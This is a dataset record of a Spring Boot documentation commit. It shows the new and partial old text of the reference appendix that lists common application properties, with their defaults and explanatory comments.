c-stanley\/spring-boot,zhangshuangquan\/spring-root,jxblum\/spring-boot,allyjunio\/spring-boot,bijukunjummen\/spring-boot,peteyan\/spring-boot,jvz\/spring-boot,kayelau\/spring-boot,damoyang\/spring-boot,habuma\/spring-boot,kdvolder\/spring-boot,mike-kukla\/spring-boot,axelfontaine\/spring-boot,mebinjacob\/spring-boot,MrMitchellMoore\/spring-boot,eric-stanley\/spring-boot,johnktims\/spring-boot,clarklj001\/spring-boot,orangesdk\/spring-boot,nareshmiriyala\/spring-boot,jbovet\/spring-boot,vpavic\/spring-boot,eonezhang\/spring-boot,satheeshmb\/spring-boot,felipeg48\/spring-boot,fogone\/spring-boot,kdvolder\/spring-boot,sungha\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,kayelau\/spring-boot,sankin\/spring-boot,tiarebalbi\/spring-boot,bjornlindstrom\/spring-boot,prakashme\/spring-boot,mdeinum\/spring-boot,DeezCashews\/spring-boot,lif123\/spring-boot,kdvolder\/spring-boot,meftaul\/spring-boot,michael-simons\/spring-boot,DONIKAN\/spring-boot,jrrickard\/spring-boot,yunbian\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,artembilan\/spring-boot,ameraljovic\/spring-boot,spring-projects\/spring-boot,ChunPIG\/spring-boot,jayeshmuralidharan\/spring-boot,npcode\/spring-boot,xwjxwj30abc\/spring-boot,aahlenst\/spring-boot,xingguang2013\/spring-boot,raiamber1\/spring-boot,axibase\/spring-boot,soul2zimate\/spring-boot,vandan16\/Vandan,SaravananParthasarathy\/SPSDemo,ameraljovic\/spring-boot,damoyang\/spring-boot,thomasdarimont\/spring-boot,rweisleder\/spring-boot,Chomeh\/spring-boot,lcardito\/spring-boot,liupugong\/spring-boot,lokbun\/spring-boot,trecloux\/spring-boot,ydsakyclguozi\/spring-boot,Makhlab\/spring-boot,rmoorman\/spring-boot,srikalyan\/spring-boot,crackien\/spring-boot,hello2009chen\/spring-boot,axibase\/spring-boot,shangyi0102\/spring-boot,satheeshmb\/spring-boot,ApiSecRay\/spring-boot,meftaul\/spring-boot,zhanhb\/spring-boot,ilayaperumalg\/spring-boot,gauravbrills\/spring-boot,eliudiaz\/spring-boot,okba1\/spring-boot,qerub\/spring-boot,coolcao\/spring-boot,jmnarloch\/spring-boot,eddumelendez\/spring-boot,donthadineshkumar\/spring-boot,murilobr\/spring-boot,nisuhw\/spring-boot,shakuzen\/spring-boot,jmnarloch\/spring-boot,AngusZhu\/spring-boot,ralenmandao\/spring-boot,ChunPIG\/spring-boot,bjornlindstrom\/spring-boot,jack-luj\/spring-boot,lingounet\/spring-boot,peteyan\/spring-boot,satheeshmb\/spring-boot,tan9\/spring-boot,shakuzen\/spring-boot,gauravbrills\/spring-boot,frost2014\/spring-boot,DeezCashews\/spring-boot,hello2009chen\/spring-boot,simonnordberg\/spring-boot,philwebb\/spring-boot,srikalyan\/spring-boot,nandakishorm\/spring-boot,peteyan\/spring-boot,nareshmiriyala\/spring-boot,paddymahoney\/spring-boot,nurkiewicz\/spring-boot,mohican0607\/spring-boot,sebastiankirsch\/spring-boot,ihoneymon\/spring-boot,166yuan\/spring-boot,paddymahoney\/spring-boot,candrews\/spring-boot,lucassaldanha\/spring-boot,kiranbpatil\/spring-boot,frost2014\/spring-boot,pvorb\/spring-boot,nandakishorm\/spring-boot,shangyi0102\/spring-boot,rweisleder\/spring-boot,forestqqqq\/spring-boot,buobao\/spring-boot,end-user\/spring-boot,xialeizhou\/spring-boot,bbrouwer\/spring-boot,mosoft521\/spring-boot,166yuan\/spring-boot,xdweleven\/spring-boot,rams2588\/spring-boot,prasenjit-net\/spring-boot,Xaerxess\/spring-boot,designreuse\/spring-boot,dfa1\/spring-boot,nurkiewicz\/spring-boot,linead\/spring-boot,ractive\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,paddymahoney\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,bclozel\/spring-boot,kayelau\/spring-boot,fulvio-m\/spring-boot,sankin\/spring-boot,panbiping\/spring-boot,snicoll\/spring-boot,donhuvy\/spring-boot,navarrogabriela\/spring-boot,mlc0202\/spring-boot,dreis2211\/spring-boot,jack-luj\/spring-boot,sungha\/spring-boot,fireshort\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources=\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# LOGGING\n\tlogging.path=\/var\/logs\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n logging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.session-timeout= # session timeout in seconds\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/HttpMapperProperties.{sc-ext}[HttpMapperProperties])\n\thttp.mappers.json-pretty-print=false # pretty print JSON\n\thttp.mappers.json-sort-keys=false # sort keys\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.view.prefix= # MVC view prefix\n\tspring.view.suffix= # ... and suffix\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.char-set=UTF-8\n\tspring.freemarker.contentType=text\/html\n\tspring.freemarker.exposeRequestAttributes=false\n\tspring.freemarker.exposeSessionAttributes=false\n\tspring.freemarker.exposeSpringMacroHelpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.requestContextAttribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/\n\tspring.freemarker.viewNames= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.char-set=UTF-8\n\tspring.groovy.template.configuration.*= # See Groovy's TemplateConfiguration\n\tspring.groovy.template.contentType=text\/html\n\tspring.groovy.template.prefix=classpath:\/templates\/\n\tspring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.char-set=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.expose-Request-attributes=false\n\tspring.velocity.expose-Session-attributes=false\n\tspring.velocity.expose-Spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cacheSeconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored=false\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27107)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongo.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties}])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties}])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.virtual-host=\n\tspring.rabbitmq.dynamic=\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# HornetQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchDatabaseInitializer.{sc-ext}[BatchDatabaseInitializer])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding=false\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # default to '\/'\n\tmanagement.add-application-context-header= # default to true\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=false\n\tendpoints.health.enabled=true\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# HEALTH INDICATORS\n\thealth.db.enabled=true\n health.mongo.enabled=true\n health.rabbit.enabled=true\n health.redis.enabled=true\n health.solr.enabled=true\n\thealth.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","old_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources=\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# LOGGING\n\tlogging.path=\/var\/logs\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n logging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.session-timeout= # session timeout in seconds\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/HttpMapperProperties.{sc-ext}[HttpMapperProperties])\n\thttp.mappers.json-pretty-print=false # pretty print JSON\n\thttp.mappers.json-sort-keys=false # sort keys\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.view.prefix= # MVC view prefix\n\tspring.view.suffix= # ... and suffix\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\n\t# FREEMARKER 